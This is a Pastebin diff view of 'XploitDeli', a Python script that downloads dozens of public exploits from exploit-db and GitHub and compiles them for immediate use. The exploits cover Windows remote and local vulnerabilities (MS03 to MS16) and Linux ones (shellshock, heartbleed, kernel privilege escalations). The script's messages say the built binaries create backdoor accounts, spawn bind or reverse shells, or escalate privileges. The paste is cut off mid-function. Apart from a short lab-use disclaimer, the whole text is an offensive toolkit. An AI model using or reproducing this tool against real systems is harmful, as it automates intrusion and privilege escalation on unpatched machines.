View difference between Paste ID: smcb43f7 and 4vBtzrD7
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/python
2
3
###################################################
4
#
5
#   XploitDeli - written by Justin Ohneiser
6
# ------------------------------------------------
7
# This program produces a variety of exploits
8
# found on exploit-db for immediate use.
9
#
10
# Note: options with an asterisk either don't work
11
# or require compilation on the target.
12
#
13
# [Warning]:
14
# This script comes as-is with no promise of functionality or accuracy.  I strictly wrote it for personal use
15
# I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
16
# functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
17
# target machines in a lab environment so please only use it against systems for which you have permission!!
18
#-------------------------------------------------------------------------------------------------------------
19
# [Modification, Distribution, and Attribution]:
20
# You are free to modify and/or distribute this script as you wish.  I only ask that you maintain original
21
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
22
# worth anything anyway :)
23
#
24
# Designed for use in Kali Linux 4.6.0-kali1-686
25
###################################################
26
27
import sys, os, subprocess
28
29
# ------------------------------------
30
# WINDOWS REMOTE
31
# ------------------------------------
32
33
def windows_exploit_suggester():
34
  commands = [
35
    ('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
36
    ('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
37
    ('Updating...','./windows-exploit-suggester.py -u'),
38
    ('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master')
39
  ]
40
  if run(commands):
41
    printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
42
43
def ms03_026():
44
  commands = [
45
    ('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
46
    ('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
47
    ('Cleaning up...','rm ms03-026.c')
48
  ]
49
  if run(commands):
50
    printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
51
52
def ms03_039_1():
53
  commands = [
54
    ('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
55
    ('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
56
    ('Cleaning up...','rm ms03-039.c')
57
  ]
58
  if run(commands):
59
    printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
60
61
def ms03_039_2():
62
  commands = [
63
    ('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
64
    ('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
65
    ('Cleaning up...','rm ms03-039.cpp')
66
  ]
67
  if run(commands):
68
    printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
69
70
def ms03_049():
71
  commands = [
72
    ('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
73
    ('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
74
    ('Cleaning up...','rm ms03-049.c')
75
  ]
76
  if run(commands):
77
    printGood("ms03-039.exe successfully created\n\t - spawns bind shell on port 5555")
78
79
def ms04_007():
80
  commands = [
81
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
82
    ('Unpacking...','tar xvzf ms04-007.tar.gz'),
83
    ('Cleaning up...','rm ms04-007.tar.gz')
84
  ]
85
  if run(commands):
86
    printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
87
88
def ms04_011_sslbof():
89
  commands = [
90
    ('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
91
    ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
92
    ('Cleaning up...','rm ms04-011.c')
93
  ]
94
  if run(commands):
95
    printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
96
97
def ms04_011_lsasarv():
98
  commands = [
99
    ('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
100
    ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
101
    ('Cleaning up...','rm ms04-011.c')
102
  ]
103
  if run(commands):
104
    printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
105
106
def ms04_031():
107
  commands = [
108
    ('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
109
    ('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
110
    ('Cleaning up...','rm ms04-031.c')
111
  ]
112
  if run(commands):
113
    printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
114
115
def ms05_017():
116
  commands = [
117
    ('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
118
    ('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
119
    ('Cleaning up...','rm ms05-017.c')
120
  ]
121
  if run(commands):
122
    printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
123
124
def ms05_039():
125
  commands = [
126
    ('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
127
    ('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
128
    ('Cleaning up...','rm ms05-039.c')
129
  ]
130
  if run(commands):
131
    printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
132
133
def ms06_040_1():
134
  commands = [
135
    ('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
136
    ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
137
    ('Cleaning up...','rm ms06-040.c')
138
  ]
139
  if run(commands):
140
    printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
141
142
def ms06_040_2():
143
  commands = [
144
    ('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
145
    ('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
146
    ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
147
    ('Cleaning up...','rm ms06-040.c')
148
  ]
149
  if run(commands):
150
    printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
151
152
def ms06_070():
153
  commands = [
154
    ('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
155
    ('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
156
    ('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
157
    ('Cleaning up...','rm ms06-070.c')
158
  ]
159
  if run(commands):
160
    printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
161
162
def ms08_067_1():
163
  commands = [
164
    ('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
165
    ('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
166
    ('Cleaning up...','rm ms08-067.c')
167
  ]
168
  if run(commands):
169
    printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
170
171
def ms08_067_2():
172
  commands = [
173
    ('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
174
    ('Preparing...','chmod 744 ms08-067.py')
175
  ]
176
  if run(commands):
177
    printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
178
179
def ms08_067_3():
180
  commands = [
181
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
182
    ('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
183
    ('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067')
184
  ]
185
  if run(commands):
186
    printGood("ms08-067.exe successfully created\n\t")
187
188
def ms09_050():
189
  commands = [
190
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
191
    ('Unpacking...','unzip ms09-050.zip'),
192
    ('Cleaning up...','rm ms09-050.zip'),
193
    ('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32')
194
  ]
195
  if run(commands):
196
    printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
197
198
exploits_windows_remote = [
199
  ("windows_exploit_suggester"  ,   windows_exploit_suggester),
200
  ("ms03-026"   ,	ms03_026),
201
  ("ms03-039 (1)"	,	ms03_039_1),
202
  ("ms03-039 (2)"   ,   ms03_039_2),
203
  ("*ms03-049"  ,   ms03_049),
204
  ("ms04-007"	,	ms04_007),
205
  ("ms04-011 - ssl bof" 	,	ms04_011_sslbof),
206
  ("ms04-011 - lsasarv.dll"	,	ms04_011_lsasarv),
207
  ("ms04-031"   ,   ms04_031),
208
  ("ms05-017"   ,   ms05_017),
209
  ("ms05-039"   ,   ms05_039),
210
  ("*ms06-040 (1)"   ,   ms06_040_1),
211
  ("ms06-040 (2)"   ,   ms06_040_2),
212
  ("ms06-070"   ,   ms06_070),
213
  ("*ms08-067 (1)"   ,   ms08_067_1),
214
  ("ms08-067 (2)"   ,   ms08_067_2),
215
  ("ms08-067 (3)"   ,   ms08_067_3),
216
  ("*ms09-050"   ,   ms09_050)
217
]
218
219
# ------------------------------------
220
# WINDOWS LOCAL
221
# ------------------------------------
222
223
def windows_privesc_check():
224
  commands = [
225
    ('Downloading...','wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
226
    ('Unpacking','unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
227
    ('Cleaning up...','rm windows-privesc-check.zip; rm -r windows-privesc-check-master')
228
  ]
229
  if run(commands):
230
    printGood("windows-privesc-check2.exe successfully created")
231
232
def ms04_011_local():
233
  commands = [
234
    ('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
235
    ('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
236
    ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
237
    ('Cleaning up...','rm ms04-011.c')
238
  ]
239
  if run(commands):
240
    printGood("ms04-011.exe successfully created\n\t")
241
242
def ms04_019_1():
243
  commands = [
244
    ('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
245
    ('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
246
    ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
247
    ('Cleaning up...','rm ms04-019.c')
248
  ]
249
  if run(commands):
250
    printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
251
252
def ms04_019_2():
253
  commands = [
254
    ('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
255
    ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
256
    ('Cleaning up...','rm ms04-019.c')
257
  ]
258
  if run(commands):
259
    printGood("ms04-019.exe successfully created\n\t")
260
261
def ms04_019_3():
262
  commands = [
263
    ('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
264
    ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
265
    ('Cleaning up...','rm ms04-019.c')
266
  ]
267
  if run(commands):
268
    printGood("ms04-019.exe successfully created\n\t")
269
270
def ms04_020():
271
  commands = [
272
    ('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
273
    ('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
274
    ('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
275
    ('Cleaning up...','rm ms04-020.c')
276
  ]
277
  if run(commands):
278
    printGood("ms04-020.exe successfully created\n\t")
279
280
def keybd():
281
  commands = [
282
    ('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'),
283
    ('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
284
    ('Cleaning up...','rm keybd.c')
285
  ]
286
  if run(commands):
287
    printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
288
289
def ms05_018():
290
  commands = [
291
    ('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
292
    ('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
293
    ('Cleaning up...','rm ms05-018.c')
294
  ]
295
  if run(commands):
296
    printGood("ms05-018.exe successfully created\n\t")
297
298
def ms05_055():
299
  commands = [
300
    ('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
301
    ('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
302
    ('Cleaning up...','rm ms05-055.c')
303
  ]
304
  if run(commands):
305
    printGood("ms05-055.exe successfuly created\n\t")
306
307
def ms06_030():
308
  commands = [
309
    ('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
310
    ('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
311
    ('Cleaning up...','rm ms06-030.c')
312
  ]
313
  if run(commands):
314
    printGood("ms06-030.exe successfully created\n\t")
315
316
def ms06_049():
317
  commands = [
318
    ('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
319
    ('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
320
    ('Cleaning up...','rm ms06-049.c')
321
  ]
322
  if run(commands):
323
    printGood("ms06-049.exe successfully created\n\t")
324
325
def spool():
326
  commands = [
327
    ('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'),
328
    ('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
329
    ('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'),
330
    ('Cleaning up...','rm spool.c')
331
  ]
332
  if run(commands):
333
    printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
334
335
def ms08_025():
336
  commands = [
337
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
338
    ('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
339
    ('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
340
    ('Cleaning up...','rm ms08-025.zip; rm -r ms08-025')
341
  ]
342
  if run(commands):
343
    printGood("ms08_025.exe successfully created\n\t")
344
345
def netdde():
346
  commands = [
347
    ('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'),
348
    ('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
349
    ('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
350
    ('Cleaning up...','rm netdde.c')
351
  ]
352
  if run(commands):
353
    printGood("netdde.exe successfully created\n\t")
354
355
def ms10_015():
356
  commands = [
357
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
358
    ('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
359
    ('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D')
360
  ]
361
  if run(commands):
362
    printGood("ms10-015.exe successfully created\n\t")
363
364
def ms10_059():
365
  commands = [
366
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
367
    ('Unpacking...','unzip ms10-059.zip'),
368
    ('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
369
    ('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri')
370
  ]
371
  if run(commands):
372
    printGood("ms10-059.exe successfully created\n\t")
373
374
def ms10_092():
375
  commands = [
376
    ('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
377
  ]
378
  if run(commands):
379
    printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
380
381
def ms11_080():
382
  commands = [
383
    ('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
384
    ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
385
    ('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec')
386
  ]
387
  if run(commands):
388
    printGood("ms11_080.exe successfully created\n\t")
389
390
def ms14_040():
391
  commands = [
392
    ('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
393
    ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
394
    ('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec')
395
  ]
396
  if run(commands):
397
    printGood("ms14-040.exe successfully created")
398
399
def ms14_058_1():
400
  commands = [
401
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
402
    ('Unpacking...','unzip ms14-058.zip'),
403
    ('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
404
    ('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX')
405
  ]
406
  if run(commands):
407
    printGood("")
408
409
def ms14_058_2():
410
  commands = [
411
    ('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
412
    ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
413
    ('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec')
414
  ]
415
  if run(commands):
416
    printGood("ms14-058.exe successfully created\n\t")
417
418
def ms14_070_1():
419
  commands = [
420
    ('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
421
    ('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
422
    ('Cleaning up...','rm ms14-070.c')
423
  ]
424
  if run(commands):
425
    printGood("ms14-070.exe successfully created\n\t")
426
427
def ms14_070_2():
428
  commands = [
429
    ('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
430
    ('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'')
431
  ]
432
  run(commands)
433
434
def ms15_010_1():
435
  commands = [
436
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
437
    ('Unpacking...','unzip ms15_010.zip'),
438
    ('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
439
    ('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
440
    ('Cleaning up...','rm ms15_010.zip; rm -r 39035')
441
  ]
442
  if run(commands):
443
    printGood("ms15-010.exe successfully created\n\t")
444
445
def ms15_010_2():
446
  commands = [
447
    ('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
448
    ('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
449
    ('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
450
    ('Cleaning up...','rm ms15-010.cpp')
451
  ]
452
  if run(commands):
453
    printGood("ms15-010.exe successfully created")
454
455
def ms15_051():
456
  commands = [
457
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe')
458
  ]
459
  if run(commands):
460
    printGood("ms15-051_32.exe and ms15_051_64.exe successfully created")
461
462
def ms16_014():
463
  commands = [
464
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
465
    ('Unpacking...','unzip ms16-014.zip'),
466
    ('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
467
    ('Cleaning up...','rm -r ms16-014.zip __MACOSX')
468
  ]
469
  if run(commands):
470
    printGood("ms16-014.exe successfully created")
471
472
def ms16_016():
473
  commands = [
474
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
475
    ('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
476
    ('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX')
477
  ]
478
  if run(commands):
479
    printGood("ms16_016.exe and Shellcode.dll successfully created")
480
481
def ms16_032():
482
  commands = [
483
    ('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1')
484
  ]
485
  if run(commands):
486
    printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
487
488
exploits_windows_local = [
489
  ("windows-privesc-check"  ,   windows_privesc_check),
490
  ("ms04-011"	,	ms04_011_local),
491
  ("ms04-019 (1)"   ,   ms04_019_1),
492
  ("ms04-019 (2)"   ,   ms04_019_2),
493
  ("ms04-019 (3)"   ,   ms04_019_3),
494
  ("ms04-020"   ,   ms04_020),
495
  ("*keybd_event"    ,   keybd),
496
  ("*ms05-018"   ,   ms05_018),
497
  ("*ms05-055"   ,   ms05_055),
498
  ("ms06-030"   ,   ms06_030),
499
  ("ms06-049"   ,   ms06_049),
500
  ("print spool service"  ,   spool),
501
  ("*ms08-025"   ,   ms08_025),
502
  ("netdde"     ,   netdde),
503
  ("ms10-015"   ,   ms10_015),
504
  ("ms10-059"   ,   ms10_059),
505
  ("ms10-092"   ,   ms10_092),
506
  ("ms11-080"   ,   ms11_080),
507
  ("ms14-040"   ,   ms14_040),
508
  ("*ms14-058 (1)"   ,   ms14_058_1),
509
  ("ms14-058 (2)"   ,   ms14_058_2),
510
  ("*ms14-070 (1)"   ,   ms14_070_1),
511
  ("ms14-070 (2)"   ,   ms14_070_2),
512
  ("*ms15-010 (1)"   ,   ms15_010_1),
513
  ("*ms15-010 (2)"   ,   ms15_010_2),
514
  ("ms15-051"   ,   ms15_051),
515
  ("*ms16-014"   ,   ms16_014),
516
  ("ms16-016"   ,   ms16_016),
517
  ("ms16-032"   ,   ms16_032)
518
]
519
520
# ------------------------------------
521
# LINUX REMOTE
522
# ------------------------------------
523
524
def shellshock():
525
  commands = [
526
    ('Downloading...','wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
527
    ('Preparing...','chmod 744 shellshock.py')
528
  ]
529
  if run(commands):
530
    printGood("shellshock.py successfully created\n\t")
531
532
def heartbleed():
533
  commands = [
534
    ('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
535
    ('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
536
    ('Cleaning up...','rm heartbleed.c')
537
  ]
538
  if run(commands):
539
    printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
540
541
exploits_linux_remote = [
542
  ("shellshock"	 	,	shellshock),
543
  ("heartbleed"     ,   heartbleed)
544
]
545
546
# ------------------------------------
547
# LINUX LOCAL
548
# -- These should be compiled on target if possible
549
# ------------------------------------
550
551
def linux_exploit_suggester():
552
  commands = [
553
    ('Downloading...','apt-get install linux-exploit-suggester'),
554
    ('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl')
555
  ]
556
  if run(commands):
557
    printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
558
559
def unix_privesc_check():
560
  commands = [
561
    ('Downloading...','wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
562
    ('Unpacking...','tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
563
    ('Cleaning up...','rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4')
564
  ]
565
  if run(commands):
566
    printGood("unix_privesc_check successfully created")
567
568
def sendpage_1():
569
  commands = [
570
    ('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
571
    ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
572
  ]
573
  run(commands)
574
575
def sendpage_2():
576
  commands = [
577
    ('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
578
    ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
579
  ]
580
  run(commands)
581
582
def ftruncate():
583
  commands = [
584
    ('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
585
    ('Compile with:','echo "gcc -o ftruncate ftruncate.c"'),
586
    ('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""')
587
  ]
588
  run(commands)
589
590
def cap_sys_admin():
591
  commands = [
592
    ('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
593
    ('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"')
594
  ]
595
  run(commands)
596
597
def compat():
598
  commands = [
599
    ('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'),
600
    ('Compile with:','echo "gcc -o compat compat.c"')
601
  ]
602
  run(commands)
603
604
def can_bcm():
605
  commands = [
606
    ('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
607
    ('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"')
608
  ]
609
  run(commands)
610
611
def rdsProtocol():
612
  commands = [
613
    ('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
614
    ('Compile with:','echo "gcc -o rds_expl rds_expl.c"')
615
  ]
616
  run(commands)
617
618
def halfNelson():
619
  commands = [
620
    ('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
621
    ('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"')
622
  ]
623
  run(commands)
624
625
def fullNelson():
626
  commands = [
627
    ('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
628
    ('Compile with:','echo "gcc -o full-nelson full-nelson.c"')
629
  ]
630
  run(commands)
631
632
def udev():
633
  commands = [
634
    ('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
635
    ('Compile with:','echo "gcc -o udev_expl udev_expl.c"')
636
  ]
637
  run(commands)
638
639
def sgid():
640
  commands = [
641
    ('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
642
    ('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"')
643
  ]
644
  run(commands)
645
646
def overlayfs_1():
647
  commands = [
648
    ('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
649
    ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
650
  ]
651
  run(commands)
652
653
def libfutex():
654
  commands = [
655
    ('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
656
    ('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"')
657
  ]
658
  run(commands)
659
660
def mempodipper():
661
  commands = [
662
    ('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
663
    ('Compile with:','echo "gcc -o mempodipper mempodipper.c"')
664
  ]
665
  run(commands)
666
667
def alpha_omega():
668
  commands = [
669
    ('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
670
    ('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"')
671
  ]
672
  run(commands)
673
674
def dirtycow():
675
  commands = [
676
    ('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
677
